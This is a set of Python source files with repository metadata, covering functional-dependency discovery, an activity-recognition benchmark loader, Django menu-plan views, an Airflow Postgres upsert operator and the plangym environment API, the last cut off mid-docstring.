dancps/FDTool
|
0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a
|
[
"CC0-1.0"
] | 13
|
2019-03-22T13:30:04.000Z
|
2022-02-01T04:46:44.000Z
|
fdtool/modules/GetFDs.py
|
dancps/FDTool
|
0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a
|
[
"CC0-1.0"
] | 3
|
2020-07-01T11:17:40.000Z
|
2022-02-13T11:20:34.000Z
|
fdtool/modules/GetFDs.py
|
dancps/FDTool
|
0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a
|
[
"CC0-1.0"
] | 11
|
2018-07-02T23:46:31.000Z
|
2021-12-14T12:29:38.000Z
|
import binaryRepr
# Create decorator function to see how many times functions are called
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs);
helper.calls = 0
helper.__name__= func.__name__
return helper;
# Calculate Partition (C_k, r(U)) - the partitions
# of each candidate at level k are calculated
# Takes in data frame of relation and a candidate in C_km1
# Outputs partition of Candidate in C_km1 in relation to data frame
@call_counter
def CardOfPartition(Candidate, df):
# If length is one, find number of unique elements in column
if len(Candidate) == 1: return df[Candidate[0]].nunique()
# If length is +1, create groups over which to find number of unique elements
else: return df.drop_duplicates(Candidate).count()[0];
# Obtain FDs(C_km1) - checks the FDs of each
# candidate X in C_k
# - FDs of the form X -> v_i, where
# v_i *Exists* U - X^{+} are checked by
# comparing *Partition* X and *Partition* X v_i
#
# F = Null_Set
# for each candidate X in C_km1
# for each v_i *exists* U - X^{+} \\Pruning rule 3
# if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then
# {
# X* = X *Union* {v_i}
# F = F *Union* {X -> v_i} \\Theorem 2
# }
# return (F);
def f(C_km1, df, Closure, U, Cardinality):
# Set F to null list; Initialize U_c to remaining columns in data frame
F = []; U_c = list(df.head(0));
# Identify the subsets whose cardinality of partition should be tested
SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])];
# Add singleton set to SubsetsToCheck if on first k-level
if len(C_km1[0]) == 1: SubsetsToCheck += C_km1;
# Iterate through subsets mapped to the Cardinality of Partition function
for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))):
# Add Cardinality of Partition to dictionary
Cardinality[binaryRepr.toBin(Cand, U)] = Card;
# Iterate through candidates of C_km1
for Candidate in C_km1:
# Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate
for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])):
# Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i}
if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]:
# Add attribute v_i to closure
Closure[binaryRepr.toBin(Candidate, U)].add(v_i)
# Add list (Candidate, v_i) to F
F.append([tuple(Candidate), v_i]);
return Closure, F, Cardinality;
| 43.528571
| 187
| 0.637348
| 435
| 3,047
| 4.363218
| 0.305747
| 0.01686
| 0.015806
| 0.031612
| 0.155954
| 0.081138
| 0.061117
| 0.061117
| 0.061117
| 0.061117
| 0
| 0.009362
| 0.263866
| 3,047
| 69
| 188
| 44.15942
| 0.836826
| 0.529373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.041667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7e6f4612c23637da085f15ec80d97da8c65063
| 1,712
|
py
|
Python
|
experiments/benchmarks/activity_benchmark.py
|
Oidlichtnwoada/LongTermDependenciesLearning
|
f2913e86183588107f16402b402524a57b6ea057
|
[
"MIT"
] | 1
|
2021-01-16T15:42:01.000Z
|
2021-01-16T15:42:01.000Z
|
experiments/benchmarks/activity_benchmark.py
|
Oidlichtnwoada/LongTermDependenciesLearning
|
f2913e86183588107f16402b402524a57b6ea057
|
[
"MIT"
] | null | null | null |
experiments/benchmarks/activity_benchmark.py
|
Oidlichtnwoada/LongTermDependenciesLearning
|
f2913e86183588107f16402b402524a57b6ea057
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
class ActivityBenchmark(benchmark.Benchmark):
def __init__(self):
super().__init__('activity',
(('--sequence_length', 64, int),
('--max_samples', 40_000, int),
('--sample_distance', 4, int),
('--loss_name', 'SparseCategoricalCrossentropy', str),
('--loss_config', {'from_logits': True}, dict),
('--metric_name', 'SparseCategoricalAccuracy', str)))
def get_data_and_output_size(self):
sequence_length = self.args.sequence_length
max_samples = self.args.max_samples
sample_distance = self.args.sample_distance
activity_table = pd.read_csv(os.path.join(self.supplementary_data_dir, 'activity.csv'), header=None)
sensor_inputs = []
time_inputs = []
activity_outputs = []
for activity_marker in activity_table[0].unique():
activity_series = activity_table[activity_table[0] == activity_marker].iloc[:, 1:]
for start_index in range(0, len(activity_series) - sequence_length + 1, sample_distance):
current_sequence = np.array(activity_series[start_index:start_index + sequence_length])
sensor_inputs.append(current_sequence[:, 1:8])
time_inputs.append(current_sequence[:, :1])
activity_outputs.append(current_sequence[-1, 8:])
return (np.stack(sensor_inputs)[:max_samples], np.stack(time_inputs)[:max_samples]), (np.stack(activity_outputs)[:max_samples],), 7
ActivityBenchmark()
| 45.052632
| 139
| 0.624416
| 186
| 1,712
| 5.424731
| 0.413978
| 0.059465
| 0.062438
| 0.065411
| 0.124876
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014914
| 0.255841
| 1,712
| 37
| 140
| 46.27027
| 0.77708
| 0
| 0
| 0
| 0
| 0
| 0.098715
| 0.031542
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f8081343c9866235ed311ae6467c672bfbe7609
| 4,685
|
py
|
Python
|
apps/menuplans/views.py
|
jajadinimueter/recipe
|
f3f0a4054a14637bf4e49728876fe7b0a029a21f
|
[
"MIT"
] | null | null | null |
apps/menuplans/views.py
|
jajadinimueter/recipe
|
f3f0a4054a14637bf4e49728876fe7b0a029a21f
|
[
"MIT"
] | null | null | null |
apps/menuplans/views.py
|
jajadinimueter/recipe
|
f3f0a4054a14637bf4e49728876fe7b0a029a21f
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as et
from dateutil import parser
from django.shortcuts import render
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import untangle
from .forms import MenuplanSearchForm
from .forms import MenuplanCreateForm
from .tables import MenuplanTable
from .dbaccess import add_menuplan
from .dbaccess import get_menuplans
from .dbaccess import create_menuplan
from .dbaccess import get_menuplan_display
def index(request):
search_query = None
if request.method == 'POST':
search_form = MenuplanSearchForm(request.POST)
else:
search_form = MenuplanSearchForm()
table_data = []
menuplans = get_menuplans(search_form.data.get('query'))
if menuplans:
document = untangle.parse(menuplans)
if int(document.menuplans['total']) > 0:
for menuplan in document.menuplans.get_elements():
name = menuplan.name.cdata
cd = parser.parse(menuplan.creationDate.cdata)
cd = cd.strftime('%d.%m.%Y %H:%M')
try:
nd = parser.parse(menuplan.name.cdata)
name = nd.strftime('%d.%m.%Y %H:%M')
except:
pass
table_data.append({
'name': name,
'creationDate': cd,
'people': menuplan.people.cdata,
'pk': menuplan.pk.cdata
})
return render(request, 'menuplans/index.html',
{'table': MenuplanTable(table_data),
'search_form': search_form})
def create(request):
if request.method == 'POST':
form = MenuplanCreateForm(request.POST)
if form.is_valid():
data = form.cleaned_data
pk, document = create_menuplan(data['people'], data['menus'])
add_menuplan(pk, et.tostring(document))
return redirect('menuplans.detail', pk=pk)
else:
form = MenuplanCreateForm()
return render(request, 'menuplans/create.html', {'form': form})
def join_non_empty(vals, sep=' '):
return sep.join([x for x in vals if x and x.strip()])
def detail(request, pk):
if request.method == 'GET':
val = get_menuplan_display(pk)
print(val)
display = et.fromstring(val)
menuplan = []
shopping_list = []
recipes = []
for shopping_list_item in display.findall('.//shoppingListItem'):
unit = shopping_list_item.findtext('unit', '')
name = shopping_list_item.findtext('name')
amount = float(shopping_list_item.findtext('amount'))
if not amount:
amount = ''
alpha_values = shopping_list_item.findall('alphaAmounts/value')
if amount or not alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([str(amount), unit])
})
for alpha_value in alpha_values:
shopping_list.append({
'name': name,
'amount': join_non_empty([alpha_value.text, unit])
})
for e_plan in display.findall('days//day'):
menuplan.append({
'day': e_plan.findtext('number'),
'recipe': e_plan.findtext('recipe')
})
for e_recipe in display.findall('recipes//recipe'):
e_ings = e_recipe.findall('.//ingredient')
ingredients = []
for e_ing in e_ings:
ing_name = e_ing.findtext('name')
ing_unit = e_ing.findtext('.//unit', '')
ing_value = e_ing.findtext('.//value', '')
ing_comment = e_ing.findtext('.//comment', '')
ingredients.append(
join_non_empty([ing_value, ing_unit, ing_name, ing_comment]))
ingredients = join_non_empty(ingredients, ', ')
instructions = []
einstructions = e_recipe.findall('.//instruction/text')
for einst in einstructions:
instructions.append(einst.text)
recipes.append({
'name': e_recipe.findtext('name'),
'ingredients': ingredients,
'instructions': instructions
})
print(recipes)
return render(request,
'menuplans/detail.html',
{
'recipes': recipes,
'menuplan': menuplan,
'shopping_list': shopping_list,
})
| 30.225806
| 81
| 0.547492
| 466
| 4,685
| 5.345494
| 0.253219
| 0.048173
| 0.024087
| 0.033721
| 0.07788
| 0.054597
| 0.044159
| 0.044159
| 0.044159
| 0.044159
| 0
| 0.000325
| 0.34365
| 4,685
| 154
| 82
| 30.422078
| 0.809756
| 0
| 0
| 0.132743
| 0
| 0
| 0.089861
| 0.008965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035398
| false
| 0.00885
| 0.115044
| 0.00885
| 0.19469
| 0.017699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f809ea0bdda1d52d937bea676c3f2375a0406e8
| 6,448
|
py
|
Python
|
data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py
|
dmitriy-e/metadata-governance
|
018a879951dee3f3c2c05ac8e05b8360dd7f4ab3
|
[
"Apache-2.0"
] | 5
|
2021-12-01T09:55:23.000Z
|
2021-12-21T16:23:33.000Z
|
data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py
|
dmitriy-e/metadata-governance
|
018a879951dee3f3c2c05ac8e05b8360dd7f4ab3
|
[
"Apache-2.0"
] | 1
|
2022-03-14T16:50:41.000Z
|
2022-03-14T16:50:41.000Z
|
data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py
|
dmitriy-e/metadata-governance
|
018a879951dee3f3c2c05ac8e05b8360dd7f4ab3
|
[
"Apache-2.0"
] | 2
|
2021-11-03T09:43:09.000Z
|
2021-11-17T10:16:29.000Z
|
from contextlib import closing
from io import StringIO
import numpy
import pandas
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extensions import connection as psycopg2_connection
from data_detective_airflow.dag_generator.works import WorkType
from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
class PgSCD1DFUpdateInsert(PgLoader):
"""Update the target table by SCD 1 by diff_change_operation
:param source: Source
:param conn_id: Connection id
:param table_name: Table name for update
:param key: The key by which update. Avoid NULL for the key.
:param diff_change_oper: Field with the flag of the operation to be applied to the record D,U,I
:param chunk_row_number: The number of rows in the chunk to load into the database and apply to the table
"""
ui_color = '#DDF4ED'
def __init__(
self,
source: list,
conn_id: str,
table_name: str,
key: list[str],
diff_change_oper: str,
chunk_row_number: int,
**kwargs
):
super().__init__(**kwargs)
self.conn_id = conn_id
self.table_name = table_name
self.key = key
self.diff_change_oper = diff_change_oper
self.chunk_row_number = chunk_row_number or MAX_INSERT_ROWS_NUMBER
self.source = source[0]
self.source_task = self.dag.task_dict[self.source]
self.source_task >> self # pylint: disable=pointless-statement
def execute(self, context):
hook = PostgresHook(postgres_conn_id=self.conn_id)
work = self.dag.get_work(work_type=WorkType.WORK_PG.value, work_conn_id=self.conn_id)
work.create(context)
source_df = self.source_task.result.read(context)
df_rows = len(source_df.index)
if not df_rows:
self.log.info('Source dataset is empty. Finishing task.')
return
if self.chunk_row_number and self.chunk_row_number < 1:
raise RuntimeError('chunk_row_number must be positive integer or None '
f'Current value is "{self.chunk_row_number}".'
)
chunk_number = self._get_chunk_number(data_row_number=df_rows, chunk_row=self.chunk_row_number)
self.log.info(f'Will process {df_rows} rows in {chunk_number} chunks.')
source_split = numpy.array_split(source_df, chunk_number)
del source_df
source = f"{work.get_path(context)}.{self.table_name.split('.')[-1]}"
for it, chunk in enumerate(source_split):
self.log.info(f'Process chunk #{it + 1} of {chunk_number}.')
with closing(hook.get_conn()) as session:
self._unload_source_to_pg(tmp_table=source, conn=session, unload_df=chunk)
self._apply_diff_change_oper(source_table=source, conn=session)
session.commit()
def _unload_source_to_pg(self, tmp_table: str, conn: psycopg2_connection, unload_df: pandas.DataFrame):
"""Upload DataFrame to TEMPORARY TABLE in postgres
:param tmp_table: Name of the temporary table
:param conn: Connection to the database
:param unload_df: DataFrame to upload to the database
"""
create_query = """
DROP TABLE IF EXISTS {tmp_table} CASCADE;
CREATE TABLE {tmp_table} AS
SELECT {target_columns}, '' as {diff_change_oper}
FROM {target_table}
LIMIT 0
""".strip()
copy_query = """
COPY {tmp_table} ({source_columns})
FROM STDIN WITH (format csv, delimiter ';')
""".strip()
query_params = {
'tmp_table': tmp_table,
'target_columns': ','.join(
self.get_table_columns(table_name=self.table_name, conn=conn)),
'source_columns': ','.join(unload_df.columns),
'target_table': self.table_name,
'diff_change_oper': self.diff_change_oper
}
with closing(conn.cursor()) as cursor:
cursor.execute(create_query.format(**query_params))
s_buf = StringIO()
unload_df.to_csv(
path_or_buf=s_buf, index=False, header=False, sep=';')
s_buf.seek(0)
cursor.copy_expert(copy_query.format(**query_params), s_buf)
def _apply_diff_change_oper(self, source_table: str, conn: psycopg2_connection):
"""Apply diff_change_oper by key, ignores unmodified columns"""
query_params = self._get_query_params(source_table, conn)
delete_query = """
DELETE FROM {target_table} trg
USING {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'D'
""".strip()
update_query = """
UPDATE {target_table} trg
SET {set_term}
FROM {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'U'
""".strip()
insert_query = """
INSERT INTO {target_table}({target_columns})
SELECT {target_columns}
FROM {source_table} src
WHERE src.{diff_change_oper} = 'I'
""".strip()
with closing(conn.cursor()) as cursor:
cursor.execute(delete_query.format(**query_params))
cursor.execute(update_query.format(**query_params))
cursor.execute(insert_query.format(**query_params))
def _get_query_params(self, source_table: str, conn: psycopg2_connection) -> dict[str, str]:
"""Creating parameters for queries"""
all_tgt_columns = self.get_table_columns(self.table_name, conn)
tgt_columns = [col for col in all_tgt_columns if col != 'processed_dttm']
key = self.key if isinstance(self.key, list) else [self.key]
key_eq_cond = ' and '.join(f"trg.{column}=src.{column}" for column in key)
changed_cond = [col for col in tgt_columns if col not in key]
set_term = ', '.join(f"{col} = src.{col}" for col in changed_cond)
if 'processed_dttm' in all_tgt_columns:
set_term = f'{set_term}, processed_dttm = now()'
target_columns = ','.join(tgt_columns)
return {
'target_table': self.table_name,
'source_table': source_table,
'key_eq_cond': key_eq_cond,
'target_columns': target_columns,
'set_term': set_term,
'diff_change_oper': self.diff_change_oper
}
| 39.317073
| 109
| 0.640199
| 845
| 6,448
| 4.602367
| 0.220118
| 0.041142
| 0.053998
| 0.023142
| 0.163795
| 0.124968
| 0.083312
| 0.046284
| 0.024685
| 0.024685
| 0
| 0.002941
| 0.261787
| 6,448
| 163
| 110
| 39.558282
| 0.814076
| 0.113058
| 0
| 0.107438
| 0
| 0
| 0.233676
| 0.036551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041322
| false
| 0
| 0.066116
| 0
| 0.140496
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f83b8fcb8f9923c7beb83eb883b788a12549bf3
| 32,588
|
py
|
Python
|
plangym/core.py
|
FragileTech/plangym
|
9a1482bea099f12f82bae27f1c5d13393daa8032
|
[
"MIT"
] | 3
|
2020-03-25T22:19:17.000Z
|
2020-11-02T16:11:32.000Z
|
plangym/core.py
|
FragileTech/plangym
|
9a1482bea099f12f82bae27f1c5d13393daa8032
|
[
"MIT"
] | 44
|
2020-03-25T14:17:54.000Z
|
2022-03-12T00:18:48.000Z
|
plangym/core.py
|
FragileTech/plangym
|
9a1482bea099f12f82bae27f1c5d13393daa8032
|
[
"MIT"
] | 2
|
2020-03-25T12:17:12.000Z
|
2020-06-19T23:07:52.000Z
|
"""Plangym API implementation."""
from abc import ABC
from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union
import gym
from gym.envs.registration import registry as gym_registry
from gym.spaces import Space
import numpy
import numpy as np
wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]]
class BaseEnvironment(ABC):
"""Inherit from this class to adapt environments to different problems."""
STATE_IS_ARRAY = True
RETURNS_GYM_TUPLE = True
SINGLETON = False
def __init__(
self,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
):
"""
Initialize a :class:`Environment`.
Args:
name: Name of the environment.
frameskip: Number of times ``step`` will be called with the same action.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
"""
self._name = name
self.frameskip = frameskip
self.autoreset = autoreset
self.delay_init = delay_init
if not delay_init:
self.init_env()
@property
def unwrapped(self) -> "BaseEnvironment":
"""
Completely unwrap this Environment.
Returns:
plangym.Environment: The base non-wrapped plangym.Environment instance
"""
return self
@property
def name(self) -> str:
"""Return is the name of the environment."""
return self._name
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
raise NotImplementedError()
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
raise NotImplementedError()
def __del__(self):
"""Teardown the Environment when it is no longer needed."""
return self.close()
def step(
self,
action: Union[numpy.ndarray, int, float],
state: numpy.ndarray = None,
dt: int = 1,
) -> tuple:
"""
Step the environment applying the supplied action.
Optionally set the state to the supplied state before stepping it.
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
state: Set the environment to the given state before stepping it.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
if state is not None:
self.set_state(state)
obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt)
if state is not None:
new_state = self.get_state()
data = new_state, obs, reward, terminal, info
else:
data = obs, reward, terminal, info
if terminal and self.autoreset:
self.reset(return_state=False)
return data
def step_batch(
self,
actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]],
states: Union[numpy.ndarray, Iterable] = None,
dt: Union[int, numpy.ndarray] = 1,
) -> Tuple[numpy.ndarray, ...]:
"""
Vectorized version of the `step` method. It allows to step a vector of \
states and actions.
The signature and behaviour is the same as `step`, but taking a list of \
states, actions and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)``
else returns ``(new_states, observs, rewards, ends, infos)``
"""
dt = (
dt
if isinstance(dt, (numpy.ndarray, Iterable))
else numpy.ones(len(actions), dtype=int) * dt
)
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)]
return tuple(list(x) for x in zip(*data))
def init_env(self) -> None:
"""
Run environment initialization.
Including in this function all the code which makes the environment impossible
to serialize will allow to dispatch the environment to different workers and
initialize it once it's copied to the target process.
"""
pass
def close(self) -> None:
"""Tear down the current environment."""
pass
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
pass
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
tuple containing ``(observs, reward, terminal, info)``.
"""
raise NotImplementedError()
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
raise NotImplementedError()
def get_state(self) -> Any:
"""
Recover the internal state of the simulation.
A state must completely describe the Environment at a given moment.
"""
raise NotImplementedError()
def set_state(self, state: Any) -> None:
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
Returns:
None
"""
raise NotImplementedError()
def get_image(self) -> Union[None, np.ndarray]:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return None
def clone(self) -> "BaseEnvironment":
"""Return a copy of the environment."""
raise NotImplementedError()
class PlanEnvironment(BaseEnvironment):
"""Base class for implementing OpenAI ``gym`` environments in ``plangym``."""
def __init__(
self,
name: str,
frameskip: int = 1,
episodic_live: bool = False,
autoreset: bool = True,
wrappers: Iterable[wrap_callable] = None,
delay_init: bool = False,
remove_time_limit=True,
):
"""
Initialize a :class:`PlanEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each ``dt``.
episodic_live: Return ``end = True`` when losing a live.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
wrappers: Wrappers that will be applied to the underlying OpenAI env. \
Every element of the iterable can be either a :class:`gym.Wrapper` \
or a tuple containing ``(gym.Wrapper, kwargs)``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
"""
self._gym_env = None
self.episodic_life = episodic_live
self.remove_time_limit = remove_time_limit
self._wrappers = wrappers
super(PlanEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
if self._gym_env is None and not self.SINGLETON:
self.init_env()
return self._gym_env
@property
def obs_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.observation_space.shape
@property
def action_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.action_space.shape
@property
def action_space(self) -> Space:
"""Return the action_space of the environment."""
return self.gym_env.action_space
@property
def observation_space(self) -> Space:
"""Return the observation_space of the environment."""
return self.gym_env.observation_space
@property
def reward_range(self):
"""Return the reward_range of the environment."""
if hasattr(self.gym_env, "reward_range"):
return self.gym_env.reward_range
@property
def metadata(self):
"""Return the metadata of the environment."""
if hasattr(self.gym_env, "metadata"):
return self.gym_env.metadata
def init_env(self):
"""Initialize the target :class:`gym.Env` instance."""
self._gym_env = self.init_gym_env()
if self._wrappers is not None:
self.apply_wrappers(self._wrappers)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode="rgb_array")
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
if self.gym_env is None and self.delay_init:
self.init_env()
obs = self.gym_env.reset()
return (self.get_state(), obs) if return_state else obs
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1):
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
reward = 0
obs, lost_live, terminal, oob = None, False, False, False
info = {"lives": -1}
n_steps = 0
for _ in range(int(dt)):
for _ in range(self.frameskip):
obs, _reward, _oob, _info = self.gym_env.step(action)
_info["lives"] = self.get_lives_from_info(_info)
lost_live = info["lives"] > _info["lives"] or lost_live
oob = oob or _oob
custom_terminal = self.custom_terminal_condition(info, _info, _oob)
terminal = terminal or oob or custom_terminal
terminal = (terminal or lost_live) if self.episodic_life else terminal
info = _info.copy()
reward += _reward
n_steps += 1
if terminal:
break
if terminal:
break
# This allows to get the original values even when using an episodic life environment
info["terminal"] = terminal
info["lost_live"] = lost_live
info["oob"] = oob
info["win"] = self.get_win_condition(info)
info["n_steps"] = n_steps
return obs, reward, terminal, info
def sample_action(self) -> Union[int, np.ndarray]:
"""Return a valid action that can be used to step the Environment chosen at random."""
if hasattr(self.action_space, "sample"):
return self.action_space.sample()
def clone(self) -> "PlanEnvironment":
"""Return a copy of the environment."""
return self.__class__(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
)
def close(self):
"""Close the underlying :class:`gym.Env`."""
if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"):
return self._gym_env.close()
def init_gym_env(self) -> gym.Env:
"""Initialize the :class:`gym.Env`` instance that the current class is wrapping."""
# Remove any undocumented wrappers
spec = gym_registry.spec(self.name)
if self.remove_time_limit:
if hasattr(spec, "max_episode_steps"):
spec._max_episode_steps = spec.max_episode_steps
if hasattr(spec, "max_episode_time"):
spec._max_episode_time = spec.max_episode_time
spec.max_episode_steps = None
spec.max_episode_time = None
gym_env: gym.Env = spec.make()
gym_env.reset()
return gym_env
def seed(self, seed=None):
"""Seed the underlying :class:`gym.Env`."""
if hasattr(self.gym_env, "seed"):
return self.gym_env.seed(seed)
def apply_wrappers(self, wrappers: Iterable[wrap_callable]):
"""Wrap the underlying OpenAI gym environment."""
for item in wrappers:
if isinstance(item, tuple):
wrapper, kwargs = item
self.wrap(wrapper, **kwargs)
else:
self.wrap(item)
def wrap(self, wrapper: Callable, *args, **kwargs):
"""Apply a single OpenAI gym wrapper to the environment."""
self._gym_env = wrapper(self.gym_env, *args, **kwargs)
@staticmethod
def get_lives_from_info(info: Dict[str, Any]) -> int:
"""Return the number of lives remaining in the current game."""
return info.get("lives", -1)
@staticmethod
def get_win_condition(info: Dict[str, Any]) -> bool:
"""Return ``True`` if the current state corresponds to winning the game."""
return False
@staticmethod
def custom_terminal_condition(old_info, new_info, oob) -> bool:
"""Calculate a new terminal condition using the info data."""
return False
def render(self, mode=None):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode=mode)
class VideogameEnvironment(PlanEnvironment):
"""Common interface for working with video games that run using an emulator."""
def __init__(
self,
name: str,
frameskip: int = 5,
episodic_live: bool = False,
autoreset: bool = True,
delay_init: bool = False,
remove_time_limit: bool = True,
obs_type: str = "rgb", # ram | rgb | grayscale
mode: int = 0, # game mode, see Machado et al. 2018
difficulty: int = 0, # game difficulty, see Machado et al. 2018
repeat_action_probability: float = 0.0, # Sticky action probability
full_action_space: bool = False, # Use all actions
render_mode: Optional[str] = None, # None | human | rgb_array
possible_to_win: bool = False,
wrappers: Iterable[wrap_callable] = None,
):
"""
Initialize a :class:`VideogameEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each step
in dt.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Restart environment when reaching a terminal state.
delay_init: If ``True`` do not initialize the ``gym.Environment``
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
obs_type: One of {"rgb", "ram", "gryscale"}.
mode: Integer or string indicating the game mode, when available.
difficulty: Difficulty level of the game, when available.
repeat_action_probability: Repeat the last action with this probability.
full_action_space: Whether to use the full range of possible actions
or only those available in the game.
render_mode: One of {None, "human", "rgb_aray"}.
